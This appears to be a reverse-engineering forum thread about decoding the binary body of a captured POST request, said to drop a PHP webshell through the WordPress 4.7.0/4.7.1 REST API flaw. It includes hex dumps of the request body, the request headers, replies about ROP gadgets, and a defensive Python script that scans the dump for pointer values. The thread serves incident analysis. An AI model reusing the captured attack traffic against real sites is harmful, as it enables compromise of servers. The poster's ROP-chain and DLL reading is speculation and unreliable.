I have a POST request that drops a PHP webshell. It exploits the REST API vulnerability in WordPress versions 4.7.0 and 4.7.1. The body of the request is binary (possibly gzip-compressed). It also looks very much like a ROP chain, because the addresses look high enough to be in system DLLs.

How can I get readable data out of the request body?

Here is a hex dump of the request body:

0000000 0400 0000 0000 0000 0000 0000 0000 0000
0000010 4000 09e7 07d8 007f 0600 0000 ff00 ffff
0000020 b0ff 05af 07d8 007f 0400 0000 0000 0000
0000030 0000 0000 0000 0000 4000 00d5 07d8 007f
0000040 0500 0000 1e00 1e73 1065 00d5 07d8 007f
0000050 0400 0000 1e00 1e72 006f 0000 0000 0000
0000060 4000 0bbd 07d8 007f 0600 0000 0900 6a1d
0000070 801d 0f00 07d8 007f 0400 0000 1d00 7767
0000080 d800 076f 07d8 007f 0000 09e3 07d8 007f
0000090 0400 0000 6800 741d f01d 0ba4 07d8 007f
00000a0 0400 0000 0900 661d e81d 076e 07d8 007f
00000b0 b000 09e2 07d8 007f 0400 0000 6d00 6c1d
00000c0 9077 0ba4 07d8 007f 0400 0000 0000 0000
00000d0 7000 076e 07d8 007f 8000 085b 07d8 007f
00000e0 0600 0000 0000 0000 b000 0f00 07d8 007f
00000f0 0400 0000 0000 1e27 002d 0000 0000 0000
0000100 1000 07fb 07d8 007f 0600 0000 0000 0000
0000110 d000 0ba7 07d8 007f 0400 0000 0700 007f
0000120 0000 0000 0000 0000 1000 0ba3 07d8 007f
0000130 0400 0000 1e00 1e72 e06f 0ba2 07d8 007f
0000140 0400 0000 0000 002b 0017 0000 0000 0000
0000150 2000 14a4 07c0 007f 0200 0000 0700 007f
0000160 7000 02a3 07d8 007f 0400 0000 0000 0000
0000170 0000 0000 0000 0000 8000 05a4 07d8 007f
0000180 0500 0000 0000 0000 5000 05a4 07d8 007f
0000190 0400 0000 0000 0000 0000 0000 0000 0000
00001a0 0000 029b 07d8 007f 0500 0000 6300 731d
00001b0 d01d 029a 07d8 007f 0400 0000 0900 6a1d
00001c0 501d 0770 07d8 007f 6000 01ad 07d8 007f
00001d0 0600 0000 6300 6f1d 9077 01ad 07d8 007f
00001e0 0400 0000 6800 741d 801d 076d 07d8 007f
00001f0 a000 119c 07d8 007f 0500 0000 0000 1d09
0000200 c068 03f7 07d8 007f 0400 0000 6d00 6c1d
0000210 0077 0000 0000 0000 b000 09e1 07d8 007f
0000220 0400 0000 0000 0000 5000 0ba3 07d8 007f
0000230 0400 0000 0700 007f 0000 0000 0000 0000
0000240 0000 0f02 07d8 007f 0600 0000 0000 0000
0000250 3000 0f02 07d8 007f 0400 0000 0000 0000
0000260 0000 0000 0000 0000 8000 0ba5 07d8 007f
0000270 0400 0000 1e00 1e73 5065 0ba5 07d8 007f
0000280 0400 0000 1e00 1e72 006f 0000 0000 0000
0000290 8000 00e3 07d8 007f 0500 0000 0000 0000
00002a0 1000 0187 07d8 007f 0400 0000 0000 0000
00002b0 0000 0000 0000 0000 8000 1276 07d8 007f
00002c0 0600 0000 1e00 1e6e 5065 085b 07d8 007f
00002d0 0400 0000 0000 0000 9800 076e 07d8 007f
00002e0 7000 0bbd 07d8 007f 0600 0000 0000 0000
00002f0 a000 0310 07d8 007f 0400 0000 0000 0000
0000300 e800 0769 07d8 007f 7000 00c7 07d8 007f
0000310 0600 0000 0000 0000 b000 00c7 07d8 007f
0000320 0400 0000 1d00 1d6a 0073 0000 0000 0000
0000330 e000 0bbc 07d8 007f 0600 0000 0900 6a1d
0000340 101d 0bbd 07d8 007f 0400 0000 1d00 7767
0000350 f800 076d 07d8 007f a000 01ac 07d8 007f
0000360 0600 0000 6800 741d d01d 01ac 07d8 007f
0000370 0400 0000 0900 661d 001d 0000 0000 0000
0000380 d000 00c6 07d8 007f 0600 0000 6d00 6c1d
0000390 1077 00c7 07d8 007f 0400 0000 7800 8400
00003a0 0000 0000 0000 0000 3000 09e8 07d8 007f
00003b0 0600 0000 0700 007f 1000 0ba8 07d8 007f
00003c0 0400 0000 0000 0000 0000 0000 0000 0000
00003d0 5000 0311 07d8 007f 0600 0000 0000 0000
00003e0 8000 0311 07d8 007f 0400 0000 8500 2700
00003f0 2000 076e 07d8 007f 6000 09e2 07d8 007f
0000400 0400 0000 0000 0000 2000 0ba4 07d8 007f
0000410 0400 0000 0000 1e27 002d 0000 0000 0000
0000420 1000 0185 07d8 007f 0600 0000 0700 007f
0000430 7000 01ac 00d8 000a
0000437


Here is the hex dump with -C:

00000000  00 04 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000010  00 40 e7 09 d8 07 7f 00  00 06 00 00 00 ff ff ff  |.@..............|
00000020  ff b0 af 05 d8 07 7f 00  00 04 00 00 00 00 00 00  |................|
00000030  00 00 00 00 00 00 00 00  00 40 d5 00 d8 07 7f 00  |.........@......|
00000040  00 05 00 00 00 1e 73 1e  65 10 d5 00 d8 07 7f 00  |......s.e.......|
00000050  00 04 00 00 00 1e 72 1e  6f 00 00 00 00 00 00 00  |......r.o.......|
00000060  00 40 bd 0b d8 07 7f 00  00 06 00 00 00 09 1d 6a  |.@.............j|
00000070  1d 80 00 0f d8 07 7f 00  00 04 00 00 00 1d 67 77  |..............gw|
00000080  00 d8 6f 07 d8 07 7f 00  00 00 e3 09 d8 07 7f 00  |..o.............|
00000090  00 04 00 00 00 68 1d 74  1d f0 a4 0b d8 07 7f 00  |.....h.t........|
000000a0  00 04 00 00 00 09 1d 66  1d e8 6e 07 d8 07 7f 00  |.......f..n.....|
000000b0  00 b0 e2 09 d8 07 7f 00  00 04 00 00 00 6d 1d 6c  |.............m.l|
000000c0  77 90 a4 0b d8 07 7f 00  00 04 00 00 00 00 00 00  |w...............|
000000d0  00 70 6e 07 d8 07 7f 00  00 80 5b 08 d8 07 7f 00  |.pn.......[.....|
000000e0  00 06 00 00 00 00 00 00  00 b0 00 0f d8 07 7f 00  |................|
000000f0  00 04 00 00 00 00 27 1e  2d 00 00 00 00 00 00 00  |......'.-.......|
00000100  00 10 fb 07 d8 07 7f 00  00 06 00 00 00 00 00 00  |................|
00000110  00 d0 a7 0b d8 07 7f 00  00 04 00 00 00 07 7f 00  |................|
00000120  00 00 00 00 00 00 00 00  00 10 a3 0b d8 07 7f 00  |................|
00000130  00 04 00 00 00 1e 72 1e  6f e0 a2 0b d8 07 7f 00  |......r.o.......|
00000140  00 04 00 00 00 00 2b 00  17 00 00 00 00 00 00 00  |......+.........|
00000150  00 20 a4 14 c0 07 7f 00  00 02 00 00 00 07 7f 00  |. ..............|
00000160  00 70 a3 02 d8 07 7f 00  00 04 00 00 00 00 00 00  |.p..............|
00000170  00 00 00 00 00 00 00 00  00 80 a4 05 d8 07 7f 00  |................|
00000180  00 05 00 00 00 00 00 00  00 50 a4 05 d8 07 7f 00  |.........P......|
00000190  00 04 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
000001a0  00 00 9b 02 d8 07 7f 00  00 05 00 00 00 63 1d 73  |.............c.s|
000001b0  1d d0 9a 02 d8 07 7f 00  00 04 00 00 00 09 1d 6a  |...............j|
000001c0  1d 50 70 07 d8 07 7f 00  00 60 ad 01 d8 07 7f 00  |.Pp......`......|
000001d0  00 06 00 00 00 63 1d 6f  77 90 ad 01 d8 07 7f 00  |.....c.ow.......|
000001e0  00 04 00 00 00 68 1d 74  1d 80 6d 07 d8 07 7f 00  |.....h.t..m.....|
000001f0  00 a0 9c 11 d8 07 7f 00  00 05 00 00 00 00 09 1d  |................|
00000200  68 c0 f7 03 d8 07 7f 00  00 04 00 00 00 6d 1d 6c  |h............m.l|
00000210  77 00 00 00 00 00 00 00  00 b0 e1 09 d8 07 7f 00  |w...............|
00000220  00 04 00 00 00 00 00 00  00 50 a3 0b d8 07 7f 00  |.........P......|
00000230  00 04 00 00 00 07 7f 00  00 00 00 00 00 00 00 00  |................|
00000240  00 00 02 0f d8 07 7f 00  00 06 00 00 00 00 00 00  |................|
00000250  00 30 02 0f d8 07 7f 00  00 04 00 00 00 00 00 00  |.0..............|
00000260  00 00 00 00 00 00 00 00  00 80 a5 0b d8 07 7f 00  |................|
00000270  00 04 00 00 00 1e 73 1e  65 50 a5 0b d8 07 7f 00  |......s.eP......|
00000280  00 04 00 00 00 1e 72 1e  6f 00 00 00 00 00 00 00  |......r.o.......|
00000290  00 80 e3 00 d8 07 7f 00  00 05 00 00 00 00 00 00  |................|
000002a0  00 10 87 01 d8 07 7f 00  00 04 00 00 00 00 00 00  |................|
000002b0  00 00 00 00 00 00 00 00  00 80 76 12 d8 07 7f 00  |..........v.....|
000002c0  00 06 00 00 00 1e 6e 1e  65 50 5b 08 d8 07 7f 00  |......n.eP[.....|
000002d0  00 04 00 00 00 00 00 00  00 98 6e 07 d8 07 7f 00  |..........n.....|
000002e0  00 70 bd 0b d8 07 7f 00  00 06 00 00 00 00 00 00  |.p..............|
000002f0  00 a0 10 03 d8 07 7f 00  00 04 00 00 00 00 00 00  |................|
00000300  00 e8 69 07 d8 07 7f 00  00 70 c7 00 d8 07 7f 00  |..i......p......|
00000310  00 06 00 00 00 00 00 00  00 b0 c7 00 d8 07 7f 00  |................|
00000320  00 04 00 00 00 1d 6a 1d  73 00 00 00 00 00 00 00  |......j.s.......|
00000330  00 e0 bc 0b d8 07 7f 00  00 06 00 00 00 09 1d 6a  |...............j|
00000340  1d 10 bd 0b d8 07 7f 00  00 04 00 00 00 1d 67 77  |..............gw|
00000350  00 f8 6d 07 d8 07 7f 00  00 a0 ac 01 d8 07 7f 00  |..m.............|
00000360  00 06 00 00 00 68 1d 74  1d d0 ac 01 d8 07 7f 00  |.....h.t........|
00000370  00 04 00 00 00 09 1d 66  1d 00 00 00 00 00 00 00  |.......f........|
00000380  00 d0 c6 00 d8 07 7f 00  00 06 00 00 00 6d 1d 6c  |.............m.l|
00000390  77 10 c7 00 d8 07 7f 00  00 04 00 00 00 78 00 84  |w............x..|
000003a0  00 00 00 00 00 00 00 00  00 30 e8 09 d8 07 7f 00  |.........0......|
000003b0  00 06 00 00 00 07 7f 00  00 10 a8 0b d8 07 7f 00  |................|
000003c0  00 04 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
000003d0  00 50 11 03 d8 07 7f 00  00 06 00 00 00 00 00 00  |.P..............|
000003e0  00 80 11 03 d8 07 7f 00  00 04 00 00 00 85 00 27  |...............'|
000003f0  00 20 6e 07 d8 07 7f 00  00 60 e2 09 d8 07 7f 00  |. n......`......|
00000400  00 04 00 00 00 00 00 00  00 20 a4 0b d8 07 7f 00  |......... ......|
00000410  00 04 00 00 00 00 27 1e  2d 00 00 00 00 00 00 00  |......'.-.......|
00000420  00 10 85 01 d8 07 7f 00  00 06 00 00 00 07 7f 00  |................|
00000430  00 70 ac 01 d8 00 0a                              |.p.....|
00000437

Headers (excluding the hostname):

POST //wp-json/wp/v2/posts/760 HTTP/1.1

Content-Length: 1077
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-504.23.4.el6.x86_64
Connection: keep-alive
Content-Type: application/json


Comments

What does the hex dump look like when you print the data with hexdump's -C option?

@SYS_V, added it to the OP.

If the ISA of the system the target application runs on is known, it should be possible to disassemble the instructions in the data block. You could probably use something like capstone to disassemble the network data. There is also a tool called ROPgadget. If you have no luck, feel free to post the actual data so that others can analyze it directly.

I have tried ROPgadget, but it fails at runtime like this: python ROPgadget.py --binary /home/admin/scripts/tester/post.data >
Is there a tool/method other than ROPgadget that can be used to disassemble network data?

Answer #1

It looks to me like the payload does not contain any instructions, only addresses of existing ROP gadgets in DLLs specific to the exploited system. Try looking up the addresses in the memory of the web server process and disassembling them. Alternatively, attach a debugger and put breakpoints on some functions that are likely to be called, to see how they are triggered, and then launch the exploit.
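As an added triage example (not part of the question or either reply), assuming the target is the x86-64 Linux host named in the User-Agent, this script rebuilds the bytes from a `hexdump -C` listing, reports every little-endian qword that lands in the usual shared-library address window at any byte offset, and lists the ASCII fragments:

```python
import re
import struct
# Constructed input: the first eight `hexdump -C` lines from the question
# (the full capture is 0x437 bytes).
SAMPLE_HEXDUMP = """\
00000000  00 04 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000010  00 40 e7 09 d8 07 7f 00  00 06 00 00 00 ff ff ff  |.@..............|
00000020  ff b0 af 05 d8 07 7f 00  00 04 00 00 00 00 00 00  |................|
00000030  00 00 00 00 00 00 00 00  00 40 d5 00 d8 07 7f 00  |.........@......|
00000040  00 05 00 00 00 1e 73 1e  65 10 d5 00 d8 07 7f 00  |......s.e.......|
00000050  00 04 00 00 00 1e 72 1e  6f 00 00 00 00 00 00 00  |......r.o.......|
00000060  00 40 bd 0b d8 07 7f 00  00 06 00 00 00 09 1d 6a  |.@.............j|
00000070  1d 80 00 0f d8 07 7f 00  00 04 00 00 00 1d 67 77  |..............gw|
00000080
"""
# Assumption: x86-64 Linux (per the User-Agent); shared libraries normally map at 0x7f...
PTR_LO, PTR_HI = 0x7F0000000000, 0x7FFFFFFFFFFF

def parse_hexdump_c(text):
    """Rebuild raw bytes from `hexdump -C` lines (offset, hex bytes, |ascii|)."""
    out = bytearray()
    for line in text.splitlines():
        m = re.match(r"^([0-9a-f]{8})\s+((?:[0-9a-f]{2}\s+)+)", line)
        if not m:
            continue                          # final offset-only line
        if int(m.group(1), 16) != len(out):   # a '*' repeat marker would land here
            raise ValueError("gap in dump at offset " + m.group(1))
        out += bytes.fromhex("".join(m.group(2).split()))
    return bytes(out)

def find_pointers(data, lo=PTR_LO, hi=PTR_HI):
    """(offset, value) of every little-endian qword in [lo, hi]."""
    hits = []
    for off in range(len(data) - 7):          # every byte offset: these candidates are unaligned
        val = struct.unpack_from("<Q", data, off)[0]
        if lo <= val <= hi:
            hits.append((off, val))
    return hits

def printable_runs(data, min_len=2):
    """Printable ASCII runs; min_len=2 keeps fragments such as 'gw' but drops noise."""
    return [m.group().decode() for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data)]

def triage(text):
    data = parse_hexdump_c(text)
    ptrs = find_pointers(data)
    vals = [v for _, v in ptrs]
    # A tight span means one mapping: match it against /proc/<pid>/maps of the web server, then disassemble there.
    return {"pointers": ptrs, "span": (min(vals), max(vals)) if vals else None,
            "ascii": printable_runs(data)}
```

On the sample lines the six candidates all sit at odd offsets and fall within about 1 MiB of each other, which is what a list of addresses into a single mapping looks like; an 8-byte-aligned scan would report none of them.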